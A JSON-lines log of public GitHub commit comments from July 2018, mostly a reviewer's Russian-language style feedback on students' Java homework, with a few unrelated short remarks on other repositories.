{"id":"7967039741","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711946,"position":132,"line":132,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:49:56Z","updated_at":"2018-07-15T08:49:56Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T08:49:56Z"}
{"id":"7967039993","type":"CommitCommentEvent","actor":{"login":"JiyeChoo"},"repo":{"name":"JiyeChoo/www"},"payload":{"comment":{"id":29711947,"position":null,"line":null,"path":null,"commit_id":"83d0d37a7b24b816da837a5d1fdf90f7c1ddb124","created_at":"2018-07-15T08:50:10Z","updated_at":"2018-07-15T08:50:10Z","author_association":"OWNER","body":"hi\r\n"}},"created_at":"2018-07-15T08:50:10Z"}
{"id":"7967040028","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711948,"position":132,"line":132,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:50:12Z","updated_at":"2018-07-15T08:50:12Z","author_association":"NONE","body":"много лишних отступов после метода"}},"created_at":"2018-07-15T08:50:12Z"}
{"id":"7967040726","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711949,"position":30,"line":30,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:50:51Z","updated_at":"2018-07-15T08:50:51Z","author_association":"NONE","body":"else не нужно здесь, бессмысленная строчка кода, ничего не делающая"}},"created_at":"2018-07-15T08:50:51Z"}
{"id":"7967041224","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711953,"position":40,"line":40,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:51:16Z","updated_at":"2018-07-15T08:51:16Z","author_association":"NONE","body":"то же, что и с year = year, нет смысла"}},"created_at":"2018-07-15T08:51:16Z"}
{"id":"7967041304","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29711954,"position":77,"line":125,"path":"dist/Health.lua","commit_id":"2d7ccfb328936e6a6656f793dad8df3302c3a2ae","created_at":"2018-07-15T08:51:21Z","updated_at":"2018-07-15T08:51:21Z","author_association":"NONE","body":"`if  not unitId or  (not UNIT_HEALTH_FITLER[unitId] and not Ovale.db.profile.apparence.fullAuraScan) then`\r\nHi! IMHO health scan should also use \"fullaura scan\" option."}},"created_at":"2018-07-15T08:51:21Z"}
{"id":"7967041751","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29711955,"position":null,"line":null,"path":null,"commit_id":"f92c61edc745646340b00dc63995a371b8d302e2","created_at":"2018-07-15T08:51:48Z","updated_at":"2018-07-15T08:51:48Z","author_association":"MEMBER","body":"Oh sorry I didn't noticed that."}},"created_at":"2018-07-15T08:51:48Z"}
{"id":"7967041811","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711956,"position":61,"line":61,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:51:51Z","updated_at":"2018-07-15T08:51:51Z","author_association":"NONE","body":"сразу return делаешь:\r\nreturn (year % 4 == 0 && year % 100 != 0) || year % 400 == 0;"}},"created_at":"2018-07-15T08:51:51Z"}
{"id":"7967042196","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711957,"position":97,"line":97,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:52:13Z","updated_at":"2018-07-15T08:52:13Z","author_association":"NONE","body":"давай названия переменным нормальные, чтобы было понятно, что там лежит"}},"created_at":"2018-07-15T08:52:13Z"}
{"id":"7967042522","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711958,"position":99,"line":99,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:52:29Z","updated_at":"2018-07-15T08:52:29Z","author_association":"NONE","body":"нет default секции, а должен быть после всех case!"}},"created_at":"2018-07-15T08:52:29Z"}
{"id":"7967043510","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711959,"position":30,"line":30,"path":"src/lesson2/task2.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:53:28Z","updated_at":"2018-07-15T08:53:28Z","author_association":"NONE","body":"нет смысла в return"}},"created_at":"2018-07-15T08:53:28Z"}
{"id":"7967043697","type":"CommitCommentEvent","actor":{"login":"mapkyca"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29711960,"position":5,"line":103,"path":"Idno/Core/Config.php","commit_id":"d9f3305c1cd5dea3de11636fa353dc351a505209","created_at":"2018-07-15T08:53:39Z","updated_at":"2018-07-15T08:53:39Z","author_association":"COLLABORATOR","body":"Going to have to push back on this. This approach is not compatible with Mongo, or similar NoSQL databases.\r\n\r\nIf the purpose of this was to avoid the multiple config bug, this issue has already been fixed. Existing multiple configs should be cleaned up with a separate tool."}},"created_at":"2018-07-15T08:53:39Z"}
{"id":"7967044328","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711961,"position":64,"line":64,"path":"src/lesson2/task2.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:54:13Z","updated_at":"2018-07-15T08:54:13Z","author_association":"NONE","body":"такие простые конструкции можно просто делать в одну строчку return number > 0;"}},"created_at":"2018-07-15T08:54:13Z"}
{"id":"7967045008","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711962,"position":22,"line":22,"path":"src/lesson2/task3.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:54:47Z","updated_at":"2018-07-15T08:54:47Z","author_association":"NONE","body":"достаточно вычислить дискриминант один раз, иначе не оптимално его рассчитывать каждый раз"}},"created_at":"2018-07-15T08:54:47Z"}
{"id":"7967045753","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711963,"position":32,"line":32,"path":"src/lesson2/task3.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:55:23Z","updated_at":"2018-07-15T08:55:23Z","author_association":"NONE","body":"с return ты понял в таких ситуациях))"}},"created_at":"2018-07-15T08:55:23Z"}
{"id":"7967046761","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711964,"position":19,"line":19,"path":"src/lesson3/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:56:15Z","updated_at":"2018-07-15T08:56:15Z","author_association":"NONE","body":"лучше использовать более компактный вариант с +=, %= и т.д."}},"created_at":"2018-07-15T08:56:15Z"}
{"id":"7967046943","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711965,"position":24,"line":24,"path":"src/lesson3/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:56:24Z","updated_at":"2018-07-15T08:56:24Z","author_association":"NONE","body":"форматируем код везде"}},"created_at":"2018-07-15T08:56:24Z"}
{"id":"7967047393","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711966,"position":21,"line":21,"path":"src/lesson3/task2.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:56:48Z","updated_at":"2018-07-15T08:56:48Z","author_association":"NONE","body":"c названием переменных все так же грустно"}},"created_at":"2018-07-15T08:56:48Z"}
{"id":"7967049874","type":"CommitCommentEvent","actor":{"login":"arghyac35"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29711975,"position":null,"line":null,"path":null,"commit_id":"42adafaf4d7cfcb921cd77c2b025e7b3b0542672","created_at":"2018-07-15T08:59:11Z","updated_at":"2018-07-15T08:59:11Z","author_association":"CONTRIBUTOR","body":"Hello sar, please check properly. https://github.com/kuntao-development/android_device_lenovo_kuntao/blob/lineage-15.1/BoardConfig.mk#L124 "}},"created_at":"2018-07-15T08:59:11Z"}
{"id":"7967050195","type":"CommitCommentEvent","actor":{"login":"minouHub"},"repo":{"name":"radis/radis"},"payload":{"comment":{"id":29711977,"position":null,"line":null,"path":null,"commit_id":"e819db79d12f84e8ca857cd9aa30d9d074d32513","created_at":"2018-07-15T08:59:29Z","updated_at":"2018-07-15T08:59:29Z","author_association":"COLLABORATOR","body":"Hi Erwan,\r\n\r\nWhy did you remove the batch_size option? It can't hurt \r\n(Anyway I think the size by default is 1 MB).\r\n\r\nMinouHub "}},"created_at":"2018-07-15T08:59:29Z"}
{"id":"7967051938","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711986,"position":30,"line":30,"path":"src/lesson3/task2.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T09:00:51Z","updated_at":"2018-07-15T09:00:51Z","author_association":"NONE","body":"с рекурсией не разобрался как я понял"}},"created_at":"2018-07-15T09:00:51Z"}
{"id":"7967052564","type":"CommitCommentEvent","actor":{"login":"olderqiang"},"repo":{"name":"kokocool/kokocool"},"payload":{"comment":{"id":29711990,"position":null,"line":null,"path":null,"commit_id":"f14d30ee2deb2c76625bced9ec2b77d0e35e2cab","created_at":"2018-07-15T09:01:19Z","updated_at":"2018-07-15T09:01:19Z","author_association":"CONTRIBUTOR","body":"www.kokocool.com"}},"created_at":"2018-07-15T09:01:19Z"}
{"id":"7967058892","type":"CommitCommentEvent","actor":{"login":"s9abriel"},"repo":{"name":"dcloudio/mui"},"payload":{"comment":{"id":29711997,"position":92,"line":92,"path":"plugin/share/plusShare.js","commit_id":"b584fd144c2307eda2a2409bf019168bfb5a7e43","created_at":"2018-07-15T09:06:36Z","updated_at":"2018-07-15T09:06:36Z","author_association":"NONE","body":"123"}},"created_at":"2018-07-15T09:06:36Z"}
{"id":"7967060813","type":"CommitCommentEvent","actor":{"login":"lakeyscott"},"repo":{"name":"dscho/hg"},"payload":{"comment":{"id":29711998,"position":null,"line":null,"path":null,"commit_id":"a9bcfc507fa6bc0fe39318c3cafc6578fe237251","created_at":"2018-07-15T09:08:19Z","updated_at":"2018-07-15T09:08:19Z","author_association":"NONE","body":"ha"}},"created_at":"2018-07-15T09:08:19Z"}
{"id":"7967061030","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29712000,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-15T09:08:33Z","updated_at":"2018-07-15T09:08:33Z","author_association":"MEMBER","body":"> When dealing with bash, the test command has syntactic sugar, that's the [ ... ]. When you use the chaining operator, &&, you perform the second command upon successful completion of the first, in this case, the first test command. When you do [ ... ] && [ ... ] you're launching the test command twice, whereas [ ... -a ... ] launches it once, and is equivalent to test ... -a .... This wasn't too much of a big deal, I just did it that way because I used to test the script on my Raspberry Pi, and I tried optimizing it a bit because it used to run very slowly.\r\n\r\nYeah I know, but the reason why I have choosen` &&` instead of` -a` is [here](https://github.com/koalaman/shellcheck/wiki/SC2166). I didn't test speed but `-a` is not well defined.\r\n\r\n> I tested the script on Kali, which is the primary operating system I provide support for, and the script failed to give the xterm a proper size. It was as small as the xterm window could possibly get, which means it failed to work. If it worked on Debian, it should've worked on Kali.\r\n\r\nYeah, did you already restore this. If not I could do that.\r\n\r\n> The control character you were using with printf wasn't working on Kali, and the text kept shifting causing the banner to print out distorted, shifting all the columns after it.\r\n\r\nIntresting on arch (using the urxvt terminal) there are no issues. \r\n\r\n> The second reason, which I didn't mention because I didn't think it'd be necessary, was that some conditions are explicitly checking for NOT 1, and you went and replace all the -1 making them 1, which would trigger the wrong sequences.\r\n\r\nI noticed that afterwards. "}},"created_at":"2018-07-15T09:08:33Z"}
{"id":"7967063908","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29712004,"position":null,"line":null,"path":null,"commit_id":"74012fc33f99b931e8756a104b75224d337c0f6c","created_at":"2018-07-15T09:11:13Z","updated_at":"2018-07-15T09:11:13Z","author_association":"COLLABORATOR","body":"Puzzle `1015-7cbe8f93` disappeared from [`src/test/resources/com/zerocracy/bundles/assigns_performer_pr/_after.groovy`](https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/assigns_performer_pr/_after.groovy), that's why I closed #1163. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-15T09:11:13Z"}
{"id":"7967066726","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712007,"position":1,"line":1,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:13:49Z","updated_at":"2018-07-15T09:13:49Z","author_association":"NONE","body":"название пакетов с маленькой буквы, читаем код конвеншен"}},"created_at":"2018-07-15T09:13:49Z"}
{"id":"7967066761","type":"CommitCommentEvent","actor":{"login":"BitangYo"},"repo":{"name":"BitangYo/NN_base"},"payload":{"comment":{"id":29712008,"position":null,"line":null,"path":null,"commit_id":"d682d4410c747722cfb33fb933f2c0350c43bb4c","created_at":"2018-07-15T09:13:50Z","updated_at":"2018-07-15T09:13:50Z","author_association":"OWNER","body":"xfhc"}},"created_at":"2018-07-15T09:13:50Z"}
{"id":"7967066899","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712010,"position":7,"line":7,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:13:58Z","updated_at":"2018-07-15T09:13:58Z","author_association":"NONE","body":"не надо делать отступ в первой строчке метода"}},"created_at":"2018-07-15T09:13:58Z"}
{"id":"7967067274","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712011,"position":77,"line":77,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:14:18Z","updated_at":"2018-07-15T09:14:18Z","author_association":"NONE","body":"сложно написано "}},"created_at":"2018-07-15T09:14:18Z"}
{"id":"7967067738","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712012,"position":52,"line":52,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:14:45Z","updated_at":"2018-07-15T09:14:45Z","author_association":"NONE","body":"комментарии можно оставлять только над классом или методом, в коде их быть не должно"}},"created_at":"2018-07-15T09:14:45Z"}
{"id":"7967068931","type":"CommitCommentEvent","actor":{"login":"Tynoy663"},"repo":{"name":"OpenTTD/OpenTTD"},"payload":{"comment":{"id":29712017,"position":null,"line":null,"path":null,"commit_id":"57d758f73ea33b4deb369074f8e1d5c911fa1e57","created_at":"2018-07-15T09:15:23Z","updated_at":"2018-07-15T09:15:23Z","author_association":"NONE","body":"Tynoy418ty@gmail.com"}},"created_at":"2018-07-15T09:15:23Z"}
{"id":"7967069496","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712018,"position":48,"line":48,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:15:54Z","updated_at":"2018-07-15T09:15:54Z","author_association":"NONE","body":"можно просто сделать return ( year % 4 == 0 && year % 100 != 0 ) || year % 400 == 0, чтобы не усложнять код"}},"created_at":"2018-07-15T09:15:54Z"}
{"id":"7967070442","type":"CommitCommentEvent","actor":{"login":"alekksander"},"repo":{"name":"jonaski/strawberry"},"payload":{"comment":{"id":29712019,"position":null,"line":null,"path":null,"commit_id":"70db0a33d144537dad6059ab72dcf6c0503035b7","created_at":"2018-07-15T09:16:41Z","updated_at":"2018-07-15T09:16:41Z","author_association":"NONE","body":"does this mean there is a .deb package coming? i can't compile for some reason…"}},"created_at":"2018-07-15T09:16:41Z"}
{"id":"7967070738","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712020,"position":48,"line":48,"path":"src/Modul1/HW1Function/Task2.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:16:57Z","updated_at":"2018-07-15T09:16:57Z","author_association":"NONE","body":"нечитабельно, 10 ра повторяется одно и тоже сообщение dome vmeschatca, дублируешь код"}},"created_at":"2018-07-15T09:16:57Z"}
{"id":"7967070901","type":"CommitCommentEvent","actor":{"login":"ManasiKerkar"},"repo":{"name":"ManasiKerkar/datasciencecoursera"},"payload":{"comment":{"id":29712021,"position":null,"line":null,"path":null,"commit_id":"75d1e82133c3cd6a191b67c049ea67bd7d20244b","created_at":"2018-07-15T09:17:05Z","updated_at":"2018-07-15T09:17:05Z","author_association":"OWNER","body":"## This is a markdown file"}},"created_at":"2018-07-15T09:17:05Z"}
{"id":"7967071092","type":"CommitCommentEvent","actor":{"login":"ManasiKerkar"},"repo":{"name":"ManasiKerkar/datasciencecoursera"},"payload":{"comment":{"id":29712022,"position":null,"line":null,"path":null,"commit_id":"75d1e82133c3cd6a191b67c049ea67bd7d20244b","created_at":"2018-07-15T09:17:14Z","updated_at":"2018-07-15T09:17:14Z","author_association":"OWNER","body":"text file"}},"created_at":"2018-07-15T09:17:14Z"}
{"id":"7967071309","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712023,"position":34,"line":34,"path":"src/Modul1/HW1Function/Task2.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:17:24Z","updated_at":"2018-07-15T09:17:24Z","author_association":"NONE","body":"else if пишется в одну строчку, смотри как мы на занятиях это делали"}},"created_at":"2018-07-15T09:17:24Z"}
{"id":"7967071891","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712025,"position":25,"line":25,"path":"src/Modul1/HW1Function/Task3.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:17:59Z","updated_at":"2018-07-15T09:17:59Z","author_association":"NONE","body":"не оптимально написано, вызывается расчет дискриминанта много раз, хотя достаточно 1 раз вызвать и присвоить переменной это значение"}},"created_at":"2018-07-15T09:17:59Z"}
{"id":"7967072467","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712026,"position":38,"line":38,"path":"src/Modul1/HW1Function/Task3.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:18:32Z","updated_at":"2018-07-15T09:18:32Z","author_association":"NONE","body":"просто return сchislo == 0; оно ведь и так возвращает булеан, не надо дополнительно что-то писать"}},"created_at":"2018-07-15T09:18:32Z"}
{"id":"7967072814","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712028,"position":41,"line":41,"path":"src/Modul1/HW1Function/Task3.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:18:54Z","updated_at":"2018-07-15T09:18:54Z","author_association":"NONE","body":"не надо писать название на русском языке латиницей, смотрим как переводится на английский это"}},"created_at":"2018-07-15T09:18:54Z"}
{"id":"7967073932","type":"CommitCommentEvent","actor":{"login":"KiwiHC16"},"repo":{"name":"KiwiHC16/Abeille"},"payload":{"comment":{"id":29712032,"position":null,"line":null,"path":null,"commit_id":"3441c68e0a30a6ad6c30b685dfe642105250bd5c","created_at":"2018-07-15T09:19:59Z","updated_at":"2018-07-15T09:19:59Z","author_association":"OWNER","body":"Non pas voulu, c est le systeme qui a repris le nom du site quand j ai fait le pdf. \r\nJe push."}},"created_at":"2018-07-15T09:19:59Z"}
{"id":"7967075932","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712034,"position":15,"line":15,"path":"src/Modul1/HW2Cucle/Task2.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:21:41Z","updated_at":"2018-07-15T09:21:41Z","author_association":"NONE","body":"не скомпилируется код даже, ты не указан тип для своей переменной chisloFiboN"}},"created_at":"2018-07-15T09:21:41Z"}
{"id":"7967083911","type":"CommitCommentEvent","actor":{"login":"fightyang"},"repo":{"name":"fightyang/test"},"payload":{"comment":{"id":29712060,"position":null,"line":null,"path":null,"commit_id":"6d50d8d20709ca7cf49af1b1a3a7fa32c8b6692f","created_at":"2018-07-15T09:29:00Z","updated_at":"2018-07-15T09:29:00Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-15T09:29:00Z"}
{"id":"7967085103","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712062,"position":81,"line":81,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T09:30:09Z","updated_at":"2018-07-15T09:30:09Z","author_association":"NONE","body":"плохо писать код, который требует комментариев, следовательно, можно написать проще)"}},"created_at":"2018-07-15T09:30:09Z"}
{"id":"7967086264","type":"CommitCommentEvent","actor":{"login":"liujq1988"},"repo":{"name":"liujq1988/helloworld"},"payload":{"comment":{"id":29712065,"position":null,"line":null,"path":null,"commit_id":"9848822b0814be6f15055a3b5115923cb235ce25","created_at":"2018-07-15T09:31:05Z","updated_at":"2018-07-15T09:31:05Z","author_association":"OWNER","body":"fasdfa"}},"created_at":"2018-07-15T09:31:05Z"}
{"id":"7967086973","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712067,"position":67,"line":67,"path":"src/com/itacademy/zakharenkov/task1/Task1.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T09:31:44Z","updated_at":"2018-07-15T09:31:44Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T09:31:44Z"}
{"id":"7967087521","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712068,"position":18,"line":18,"path":"src/com/itacademy/zakharenkov/task1/Task1.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T09:32:13Z","updated_at":"2018-07-15T09:32:13Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T09:32:13Z"}
{"id":"7967089008","type":"CommitCommentEvent","actor":{"login":"tshjortile"},"repo":{"name":"tshjortile/tshjortile.github.io"},"payload":{"comment":{"id":29712078,"position":null,"line":null,"path":null,"commit_id":"f923c06a1dfa35cbc5b4bbc98beae416d621473d","created_at":"2018-07-15T09:33:30Z","updated_at":"2018-07-15T09:33:30Z","author_association":"OWNER","body":"merged."}},"created_at":"2018-07-15T09:33:30Z"}
{"id":"7967091090","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712080,"position":46,"line":46,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T09:35:22Z","updated_at":"2018-07-15T09:35:22Z","author_association":"NONE","body":"discriminant вызывается  очень часто, не оптимально, один раз вызвать и хранить в переменной"}},"created_at":"2018-07-15T09:35:22Z"}
{"id":"7967093428","type":"CommitCommentEvent","actor":{"login":"sleto-it"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":29712083,"position":null,"line":null,"path":null,"commit_id":"70bb9b3b2824d1345d5b44144ed409569a7bfcd4","created_at":"2018-07-15T09:37:30Z","updated_at":"2018-07-15T09:37:30Z","author_association":"CONTRIBUTOR","body":"@frankmayer, regarding your latest comment. Thanks for your feedback: it took some time but this is now fixed in the devel documentation. thanks again"}},"created_at":"2018-07-15T09:37:30Z"}
{"id":"7967095721","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework3"},"payload":{"comment":{"id":29712085,"position":33,"line":33,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"42d5afc815983105ebc7d0ecb1cb78776c64d999","created_at":"2018-07-15T09:39:34Z","updated_at":"2018-07-15T09:39:34Z","author_association":"NONE","body":"зачем объявлять переменную за циклов for. Тем самым увеличиваешь область видимости ее, так делать плохо, область видимости должна быть как можно меньше, поэтому помещай ее в foir"}},"created_at":"2018-07-15T09:39:34Z"}
{"id":"7967096173","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework3"},"payload":{"comment":{"id":29712086,"position":44,"line":44,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"42d5afc815983105ebc7d0ecb1cb78776c64d999","created_at":"2018-07-15T09:39:58Z","updated_at":"2018-07-15T09:39:58Z","author_association":"NONE","body":"потеряешь вещественную часть при делении, приводи к double"}},"created_at":"2018-07-15T09:39:58Z"}
{"id":"7967096787","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework3"},"payload":{"comment":{"id":29712088,"position":38,"line":38,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"42d5afc815983105ebc7d0ecb1cb78776c64d999","created_at":"2018-07-15T09:40:30Z","updated_at":"2018-07-15T09:40:30Z","author_association":"NONE","body":"смысла нет присваивать значение, если оно =, поэтому тут лучше использовать строго больше >"}},"created_at":"2018-07-15T09:40:30Z"}
{"id":"7967098391","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29712089,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T09:41:56Z","updated_at":"2018-07-15T09:41:56Z","author_association":"CONTRIBUTOR","body":"Because it wouldn't run on CI, anyway, I'll try and hijack the wife's Chromebook this afternoon."}},"created_at":"2018-07-15T09:41:56Z"}
{"id":"7967099892","type":"CommitCommentEvent","actor":{"login":"samerton"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29712093,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-15T09:43:18Z","updated_at":"2018-07-15T09:43:18Z","author_association":"MEMBER","body":"@baxandrei \r\n\r\nAh ok, that's not a bug, just how profile fields are checked.\r\n\r\nI have changed this in e442f2af82a6e4575670798f6817e16b8ae667ef"}},"created_at":"2018-07-15T09:43:18Z"}
{"id":"7967100919","type":"CommitCommentEvent","actor":{"login":"HitanshiMehta"},"repo":{"name":"HitanshiMehta/html1"},"payload":{"comment":{"id":29712096,"position":null,"line":null,"path":null,"commit_id":"aaca2e8cddbd70fdb0eb3ca926575243b7fc4ce2","created_at":"2018-07-15T09:44:14Z","updated_at":"2018-07-15T09:44:14Z","author_association":"OWNER","body":"basic data updated"}},"created_at":"2018-07-15T09:44:14Z"}
